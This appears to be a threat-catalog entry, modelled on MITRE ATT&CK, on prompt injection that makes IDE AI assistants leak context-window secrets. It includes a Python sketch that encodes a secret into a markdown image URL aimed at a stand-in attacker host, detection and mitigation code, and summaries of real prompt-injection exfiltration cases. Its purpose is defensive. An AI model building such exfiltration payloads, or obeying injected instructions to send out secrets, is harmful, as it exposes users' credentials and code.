AIDE-011: Context Window Sensitive Data Exfiltration

Tactics: Collection, Exfiltration
Coverage: D (gap candidate)

Description

Adversary Behavior: Adversaries use prompt injection to subvert an AI assistant integrated into a development environment, directing it to collect sensitive data from its context window and transmit that data through the system's own output channels.

AI/IDE Mechanism: The LLM's native context assembly mechanism serves as the collection system — the adversary does not deploy separate collection tooling but instead subverts the AI's existing access to project files and environment data. The context window contains source code, credentials, API schemas, and infrastructure configurations assembled by the IDE during normal operation.

Execution Path: The adversary directs the AI system through prompt injection to collect sensitive data from its context window and transmit it through available output channels. Exfiltration channels include: markdown or HTML rendering that triggers network requests to adversary-controlled URLs with data encoded in the request path or parameters; code generation that embeds sensitive data in output committed to adversary-accessible repositories; tool invocation arguments that include sensitive data in web requests or file write operations; and AI API traffic routed through adversary-controlled proxies.
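As an illustration of the markdown-rendering channel described above, the following minimal sketch shows how a prompt-injected assistant could encode context data into an image reference (the attacker URL and the secret value are hypothetical, for illustration only):

```python
import base64

# Hypothetical adversary-controlled endpoint (illustrative, not a real host).
ATTACKER_URL = "https://attacker.example/collect"

def build_exfil_markdown(secret: str) -> str:
    """Embed context-window data in a markdown image reference.

    If the IDE renders this markdown, fetching the "image" issues an HTTP
    request whose query string carries the encoded secret to the attacker.
    """
    payload = base64.urlsafe_b64encode(secret.encode()).decode()
    return f"![status]({ATTACKER_URL}?d={payload})"
```

Note that no separate collection tooling is involved: the assistant's ordinary markdown output, once rendered, performs the network transmission.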

Security Impact: Sensitive data including source code, credentials, API schemas, and infrastructure configurations are exfiltrated through channels that are difficult to distinguish from legitimate AI assistant operations, bypassing traditional DLP controls designed for conventional exfiltration patterns.

Platforms

Windows, macOS, Linux

Detection

Inspect LLM-generated output for encoded data patterns (base64, URL encoding) in unexpected contexts such as markdown image references, URLs, and code comments. Monitor network requests triggered by rendering LLM output content. Compare data in outbound requests against sensitive content present in the context window.
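A minimal sketch of the comparison step above, assuming the defender maintains a list of known-sensitive strings from the context window (the regex alphabets and the 24-character length threshold are illustrative and should be tuned per deployment):

```python
import base64
import re

# Illustrative patterns; thresholds should be tuned per deployment.
B64_RUN = re.compile(r"[A-Za-z0-9+/_-]{24,}")
MD_IMAGE_URL = re.compile(r"!\[[^\]]*\]\((https?://[^)\s]+)\)")

def find_suspect_urls(llm_output: str, context_secrets: list[str]) -> list[str]:
    """Flag markdown image URLs carrying base64 runs that decode to data
    known to be present in the assembled context window."""
    hits = []
    for url in MD_IMAGE_URL.findall(llm_output):
        for run in B64_RUN.findall(url):
            padded = run + "=" * (-len(run) % 4)  # restore base64 padding
            try:
                decoded = base64.urlsafe_b64decode(padded).decode("utf-8", "ignore")
            except Exception:
                continue
            if any(secret in decoded for secret in context_secrets):
                hits.append(url)
                break
    return hits
```

In practice this check would run on the same telemetry as the Prompt Content and Response Content components below, and would also cover other encodings (hex, URL encoding) and channels (tool arguments, commit contents).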

Detecting Data Components (4)

Prompt Content
Full text of prompts sent to the LLM including system prompts, user instructions, and assembled context.
Response Content
Full text of LLM responses including generated code, explanations, and tool call requests.
File Context Inclusion
Events capturing which local files are included in the LLM context window for each inference request.
Token Metadata
Metadata about inference requests including token counts, model selection, latency, and processing parameters.

Mitigations (1)

LLM Output Validation and Encoding Detection
Scan LLM-generated output for encoded data patterns (base64, URL encoding), embedded URLs, and content that diverges from the prompt intent. Implement output content policies that block exfiltration patterns in generated code, markdown rendering, and tool invocations.
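One way to implement such an output content policy is to neutralize image references to non-allowlisted hosts before the output is rendered. A minimal sketch (the allowlist entries are placeholders, not a recommendation):

```python
import re
from urllib.parse import urlparse

# Placeholder allowlist; replace with hosts your organization trusts.
ALLOWED_IMAGE_HOSTS = {"raw.githubusercontent.com", "docs.internal.example"}

MD_IMAGE = re.compile(r"!\[([^\]]*)\]\((https?://[^)\s]+)\)")

def sanitize_markdown(output: str) -> str:
    """Replace image references to non-allowlisted hosts with inert text,
    so rendering the output cannot trigger requests that carry context data."""
    def _replace(m: re.Match) -> str:
        host = urlparse(m.group(2)).hostname or ""
        if host in ALLOWED_IMAGE_HOSTS:
            return m.group(0)  # keep trusted image reference intact
        return "[blocked image: " + host + "]"
    return MD_IMAGE.sub(_replace, output)
```

Blocking at render time closes the zero-click variant of this channel (cf. CamoLeak and EchoLeak below); code generation and tool-invocation channels require analogous policies on their respective outputs.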

Data Sources

Network Traffic: Network Connection Creation
Network Traffic: Network Traffic Content
Application Log: Application Log Content

References

MITRE ATT&CK mapping
Candidate gap; proposed sub-technique of T1041 (Exfiltration Over C2 Channel).
ToolLeak Prompt Exfiltration
Red-Teaming Coding Agents from a Tool-Invocation Perspective: An Empirical Security Assessment
https://arxiv.org/abs/2509.05755
CamoLeak (Legit Security, Jun 2025)
GitHub Copilot PR data exfiltration via camo URLs — zero-click secret extraction from context window. CVSS 9.6.
https://www.legitsecurity.com/blog/camoleak
EchoLeak — CVE-2025-32711 (Aim Security, Jun 2025)
Zero-click data exfiltration from Microsoft 365 Copilot via markdown email injection. CVSS 9.3.
https://www.aim.security/research/echoleak
ChatGPT SpAIware (Rehberger, Sep 2024)
Persistent data exfiltration from ChatGPT via memory poisoning — retrieval-independent persistence across sessions.
https://arxiv.org/abs/2412.06090
IDEsaster CVEs
JSON schema validation exfiltration — secrets written to JSON with remote $schema URL trigger HTTP validation request carrying sensitive data (Marzouk, 2025-2026)
https://byteiota.com/idesaster-30-cves-hit-cursor-github-copilot-all-ai-ides/
Knostic - AI Assistants Leak Secrets
AI assistants automatically ingest .env and config files, exposing secrets through context window without explicit user action (Knostic, 2025)
https://www.knostic.ai/blog/ai-coding-assistants-leaking-secrets
Log-To-Leak
Post-hoc additive attack: the agent completes its task, then covertly invokes a malicious logging tool; up to a 100% attack success rate (ASR) on GPT-5; prompt-sandwiching and DataSentinel defenses fail (OpenReview/ICLR 2026 submission, 2025)
https://openreview.net/forum?id=UVgbFuXPaO
RoguePilot
Passive prompt injection via GitHub Issues exfiltrates GITHUB_TOKEN using JSON $schema download and symlink traversal — full repository takeover (Orca Security, 2025)
https://orca.security/resources/blog/roguepilot-github-copilot-vulnerability/

STIX Metadata

type attack-pattern
id attack-pattern--a0c13a6a-21b3-4054-85c3-a2e3b6e037fe
spec_version 2.1
created 2026-02-23T00:00:00.000Z
modified 2026-02-23T00:00:00.000Z
created_by_ref identity--f5b5ec62-ffbd-4afd-9ee5-7c648406e189
x_mitre_is_subtechnique false
x_mitre_version 0.1
x_mitre_status candidate